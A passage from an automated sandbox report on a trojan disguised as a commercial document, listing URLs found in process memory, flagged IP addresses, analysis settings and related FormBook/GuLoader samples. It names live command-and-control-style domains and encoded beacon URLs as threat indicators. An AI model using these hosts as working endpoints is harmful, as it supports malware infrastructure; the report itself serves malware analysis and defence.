                                                                          https://excel.office.comexplorer.exe, 00000004.00000003.12984871283.000000000CE3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12983429238.0000000009271000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000CE3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11520300348.0000000009240000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12980663330.0000000009240000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16285862021.000000000CE3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16271947395.0000000009272000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDRFQINL0607_Commerical_list.exe, 00000002.00000001.11412040635.0000000000626000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                              		high
                                                                              https://www.namesilo.comexplorer.exe, 00000004.00000002.16303460985.00000000130BF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16264541755.0000000004DFF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.gopher.ftp://ftp.RFQINL0607_Commerical_list.exe, 00000002.00000001.11412040635.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.lido.systemsReferer:explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.msn.com/de-de/nachrichten/politik/stimmung-auf-dem-tiefpunkt-in-einem-600-seelen-dorf-enexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.luckymotherclucker.comexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.google.comRFQINL0607_Commerical_list.exe, 00000002.00000003.11492678485.000000000305F000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11493328121.000000000305F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.msn.com/de-de/nachrichten/panorama/neonazis-wollten-badegexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.msn.com/de-de/nachrichten/panorama/rettungshubschrauber-kollidiert-mit-baum-in-dresden/aexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.ballbucketssalesstore.comReferer:explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.ballbucketssalesstore.com/fg83/explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.shebyoaksmovie.comexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://drive.google.com/RFQINL0607_Commerical_list.exe, 00000002.00000002.11619820508.000000000301A000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11619820508.0000000003028000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.msn.com/de-de/nachrichten/panorama/kaufland-partnersuche-sorgt-fexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.kmxbcx.xyz/fg83/explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.ngbjf.cyou/fg83/www.visionaryglobalconsulting.comexplorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.gewep.cloud/fg83/www.telefonino.shopexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.pingpongtable-sg.bondReferer:explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.7sdide.xyzexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: phishing
                                                                                            		unknown
                                                                                            http://www.nrodwukb.clickReferer:explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.sfaiqhwxebvtre.net/fg83/www.rtuakl.xyzexplorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.msn.com/de-de/sport/motorsport/nascar/renn-kalenderexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.7sdide.xyzReferer:explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.telefonino.shop/fg83/www.zentrimax.comexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              http://www.sfaiqhwxebvtre.netReferer:explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeSexplorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.7sdide.xyz/fg83/explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: phishing
                                                                                                		unknown
                                                                                                http://www.sanlimarket.comexplorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.rtuakl.xyz/fg83/www.r5fesgy.comexplorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: phishing
                                                                                                		unknown
                                                                                                http://www.cryptor.store/fg83/explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.kmxbcx.xyzexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://nsis.sf.net/NSIS_ErrorErrorRFQINL0607_Commerical_list.exefalse
                                                                                                  		high
                                                                                                  http://www.deyuming.icu/fg83/www.7sdide.xyzexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.telefonino.shopexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://outlook.comexplorer.exe, 00000004.00000002.16292132140.000000000FCCE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11775176813.000000000FCCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11541326939.000000000FC79000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.luckymotherclucker.com/fg83/explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.aitechscope.comexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://word.office.comt.explorer.exe, 00000004.00000002.16292132140.000000000FCCE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11775176813.000000000FCCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11541326939.000000000FC79000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://www.msn.com/de-de/finanzen/top-stories/nach-explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.cryptor.storeReferer:explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://www.msn.com/de-de/lifestyle/leben/mutter-lexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.msn.com/de-de/sport/fussball/coppa-italiaexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.msn.com/de-de/sport/fussball/englandexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.nrodwukb.click/fg83/explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://www.msn.com/de-de/reisen/nachrichten/passagier-hatte-vibration-bemerkt-lufthansa-flug-nach-mexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://nsis.sf.net/NSIS_ErrorRFQINL0607_Commerical_list.exefalse
                                                                                                                		high
                                                                                                                http://www.r5fesgy.comReferer:explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.nrodwukb.click/fg83/www.deyuming.icuexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://www.msn.com/de-de/nachrichten/bildergalerien/photo-of-the-day/ss-AA1ePdb4explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://android.notify.windows.com/iOSexplorer.exe, 00000004.00000002.16279705223.000000000C877000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000C877000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.pingpongtable-sg.bond/fg83/www.rtuakl.xyzexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000004.00000002.16279705223.000000000C8D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000C8D7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.zentrimax.com/fg83/www.luckymotherclucker.comexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Teaser/tempdrop1.svgexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.sfaiqhwxebvtre.netexplorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://android.notify.windows.com/iOSst.exe-explorer.exe, 00000004.00000002.16279705223.000000000C877000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000C877000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.quovadis.bm0RFQINL0607_Commerical_list.exe, 00000002.00000003.11498070989.000000000305A000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11620419539.000000000305A000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11502862919.0000000003057000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11492678485.000000000305F000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11493328121.000000000305F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.msn.com/de-de/auto/nachrichten/das-haben-sie-noch-nie-gesehen-roboter-jagt-falschparker/explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.r5fesgy.com/fg83/explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://wamiz.de/neuigkeiten/37247/frauen-auto-kamera-aussetzenexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.msn.com/de-de/nachrichten/politik/ukraine-krieg-militexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.cryptor.store/fg83/www.sfaiqhwxebvtre.netexplorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://www.msn.com/de-de/nachrichten/welt/ecowas-plant-militexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.msn.com/de-de/wetter/topgeschichten/mega-sturm-kommt-meteorologe-warnt-darum-wird-es-lebexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.aitechscope.com/fg83/explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000004.00000002.16279705223.000000000C877000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000C877000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.mexplorer.exe, 00000004.00000003.12980663330.000000000914A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11520300348.000000000911A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16270130996.000000000914B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.zentrimax.comReferer:explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://windows.msn.com/shellexplorer.exe, 00000004.00000003.11775176813.000000000FCCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11541326939.000000000FC79000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.msn.com/de-de/lifestyle/liebe-beziehung/frauen-steigen-aus-dem-auto-was-sie-tun-ist-unerexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		high

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          185.53.179.91
                                                                                                                                          		www.pingpongtable-sg.bondGermany
                                                                                                                                          		61969TEAMINTERNET-ASDEtrue
                                                                                                                                          18.225.33.210
                                                                                                                                          		www.r5fesgy.comUnited States
                                                                                                                                          		16509AMAZON-02UStrue
                                                                                                                                          154.205.111.163
                                                                                                                                          		www.ddh979.comSeychelles
                                                                                                                                          		8100ASN-QUADRANET-GLOBALUStrue
                                                                                                                                          31.31.198.61
                                                                                                                                          		www.mtotem.onlineRussian Federation
                                                                                                                                          		197695AS-REGRUtrue
                                                                                                                                          92.205.50.73
                                                                                                                                          		www.lido.systemsGermany
                                                                                                                                          		8972GD-EMEA-DC-SXB1DEtrue
                                                                                                                                          142.250.185.110
                                                                                                                                          		drive.google.comUnited States
                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                          91.195.240.123
                                                                                                                                          		www.ngbjf.cyouGermany
                                                                                                                                          		47846SEDO-ASDEtrue
                                                                                                                                          104.21.6.57
                                                                                                                                          		www.telefonino.shopUnited States
                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                          150.95.255.38
                                                                                                                                          		www.sfaiqhwxebvtre.netJapan7506INTERQGMOInternetIncJPtrue
                                                                                                                                          203.161.56.237
                                                                                                                                          		www.rtuakl.xyzMalaysia
                                                                                                                                          		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                                                          85.10.194.228
                                                                                                                                          		zentrimax.comGermany
                                                                                                                                          		24940HETZNER-ASDEtrue
                                                                                                                                          188.114.97.3
                                                                                                                                          		www.ballbucketssalesstore.comEuropean Union
                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                          76.223.26.96
                                                                                                                                          		342284.parkingcrew.netUnited States
                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                          172.217.18.97
                                                                                                                                          		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                          34.102.136.180
                                                                                                                                          		luckymotherclucker.comUnited States
                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                          198.54.117.212
                                                                                                                                          		parkingpage.namecheap.comUnited States
                                                                                                                                          		22612NAMECHEAP-NETUSfalse
                                                                                                                                          43.154.67.170
                                                                                                                                          		www.nrodwukb.clickJapan4249LILLY-ASUStrue

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox Version:38.0.0 Beryl
                                                                                                                                          Analysis ID:1295687
                                                                                                                                          Start date and time:2023-08-23 09:26:33 +02:00
                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 17m 15s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                          Run name:Suspected Instruction Hammering
                                                                                                                                          Number of analysed new started processes analysed:7
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • HDC enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample file name:RFQINL0607_Commerical_list.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.evad.winEXE@8/9@23/17
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          HDC Information:
                                                                                                                                          • Successful, ratio: 35.9% (good quality ratio 34%)
                                                                                                                                          • Quality average: 76.3%
                                                                                                                                          • Quality standard deviation: 26.9%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 87%
                                                                                                                                          • Number of executed functions: 55
                                                                                                                                          • Number of non-executed functions: 276
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                          • Excluded domains from analysis (whitelisted): array806.prod.do.dsp.mp.microsoft.com, ctldl.windowsupdate.com, disc801.prod.do.dsp.mp.microsoft.com, array807.prod.do.dsp.mp.microsoft.com
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          No simulations

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          185.53.179.91Scan_Doc.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.hyperpigmentation-91528.bond/g94s/?DrKTC2=LjGd&e8a=tzSFV3H7hErTYvWZwPPC/GAyGN0rrg2x5F2fwYgRRUbDdRuSW2XehEr5Lw08uOFm07l+
                                                                                                                                          E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                          • www.credit-cards-54889.com/mi94/?7n-Lh=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7nrLOp=h2JXJD
                                                                                                                                          ekstre_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                          • www.credit-cards-54889.com/mi94/?_N6l56=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&3fK0g=JxoL4
                                                                                                                                          ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                          • www.credit-cards-54889.com/mi94/?iN64=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7ncHc8=Tv6lQt-XnpBl3ra
                                                                                                                                          ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                          • www.credit-cards-54889.com/mi94/?-Z=6lfDx&5jbDpbb=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m
                                                                                                                                          E-DEKONT_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
